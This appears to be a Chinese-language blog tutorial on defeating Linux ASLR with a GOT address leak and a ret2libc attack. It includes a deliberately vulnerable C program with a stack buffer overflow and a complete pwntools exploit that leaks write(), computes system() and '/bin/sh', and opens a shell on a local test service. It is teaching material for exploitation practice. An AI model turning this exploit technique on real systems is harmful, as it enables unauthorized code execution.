Linux下的ASLR(PIE)内存保护机制

1.1    Linux下的ASLR内存保护机制

1.1.1    Linux下的ASLR工作原理

工作原理与window下的aslr类似

 

1.1.2 Linux下利用内存地址泄露绕过ASLR

⑴.  原理分析:

那么如何解决地址随机化的问题呢?思路是:我们需要先泄漏出libc.so某些函数在内存中的地址,然后再利用泄漏出的函数地址根据偏移量计算出system()函数和/bin/sh字符串在内存中的地址,然后再执行我们的ret2libc的shellcode。既然栈,libc,heap的地址都是随机的。我们怎么才能泄露出libc.so的地址呢?方法还是有的,因为程序本身在内存中的地址并不是随机的,所以我们只要把返回值设置到程序本身就可执行我们期望的指令了。

首先我们利用objdump来查看可以利用的plt函数和函数对应的got表:

 

 

我们发现除了程序本身的实现的函数之外,我们还可以使用read@plt()和write@plt()函数。但因为程序本身并没有调用system()函数,所以我们并不能直接调用system()来获取shell。但其实我们有write@plt()函数就够了,因为我们可以通过write@plt ()函数把write()函数在内存中的地址也就是write.got给打印出来。既然write()函数实现是在libc.so当中,那我们调用的write@plt()函数为什么也能实现write()功能呢? 这是因为linux采用了延时绑定技术,当我们调用write@plit()的时候,系统会将真正的write()函数地址link到got表的write.got中,然后write@plit()会根据write.got 跳转到真正的write()函数上去。(如果还是搞不清楚的话,推荐阅读《程序员的自我修养 - 链接、装载与库》这本书)

因为system()函数和write()在libc.so中的offset(相对地址)是不变的,所以如果我们得到了write()的地址并且拥有目标服务器上的libc.so就可以计算出system()在内存中的地址了。然后我们再将pc指针return回vulnerable_function()函数,就可以进行ret2libc溢出攻击,并且这一次我们知道了system()在内存中的地址,就可以调用system()函数来获取我们的shell了。

⑵.环境准备:

i.漏洞代码:

#include <stdio.h>

#include <stdlib.h>

#include <unistd.h>

#include <string.h>

void flow(){

    char buf[128];

    read(STDIN_FILENO,buf,256);

}

int main(){

    flow();

    char a[]="hello";

    write(STDOUT_FILENO,a,strlen(a));

    return 0;

}

编译指令:

gcc -fno-stack-protector -g -m32 -o vuln vuln.c

 

ii.测试环境:

测试系统:Ubuntu 16.04(这里用kali 2.0 rolling 有问题,链接是的重定位不通?欢迎各位一起来讨论)

辅助插件:peda

系统开启aslr:

 

⑶.测试分析:

i.存在漏洞的函数flow返回地址:

反汇编主函数:

 

漏洞函数位置:0x0804846b。

 

ii.确定偏移量:

利用pattern.py脚本实现(可以在GitHub上下到):

生成150字节的字符串

 

在调试器运行程序:

 

返回地址被覆盖为0x37654136: 

确定偏移:

 

偏移量为140字节。

⑷.攻击过程:

i.exp脚本:

#!/usr/bin/env python

from pwn import *

 

libc = ELF('/lib/i386-linux-gnu/libc.so.6')

elf = ELF('/home/zhang/pass_NX/vuln')

 

p = remote('127.0.0.1', 10003)

 

plt_write = elf.symbols['write']

print 'plt_write= ' + hex(plt_write)

got_write = elf.got['write']

print 'got_write= ' + hex(got_write)

vulfun_addr = 0x804846b

print 'vulfun= ' + hex(vulfun_addr)

 

“””plt_write是主程序中write函数的地址,也是write@plt()函数的地址,后面是write函数的参数,将got表中的write()函数的真实地址写入到stdout。”””

payload1 = 'a'*140 + p32(plt_write) + p32(vulfun_addr) + p32(1) +p32(got_write) + p32(4)

 

print "\n###sending payload1 ...###"

p.send(payload1)

 

print "\n###receving write() addr...###"

write_addr = u32(p.recv(4))

print 'write_addr=' + hex(write_addr)

 

print "\n###calculating system() addr and \"/bin/sh\" addr...###"

system_addr = write_addr - (libc.symbols['write'] - libc.symbols['system'])

print 'system_addr= ' + hex(system_addr)

binsh_addr = write_addr - (libc.symbols['write'] - next(libc.search('/bin/sh')))

print 'binsh_addr= ' + hex(binsh_addr)

 

payload2 = 'a'*140  + p32(system_addr) + p32(vulfun_addr) + p32(binsh_addr)

 

print "\n###sending payload2 ...###"

p.send(payload2)

p.interactive()

 

ii. 运行脚本,攻击成功:

posted on 2018-06-13 14:31  zhang293  阅读(2197)  评论(0编辑  收藏  举报

导航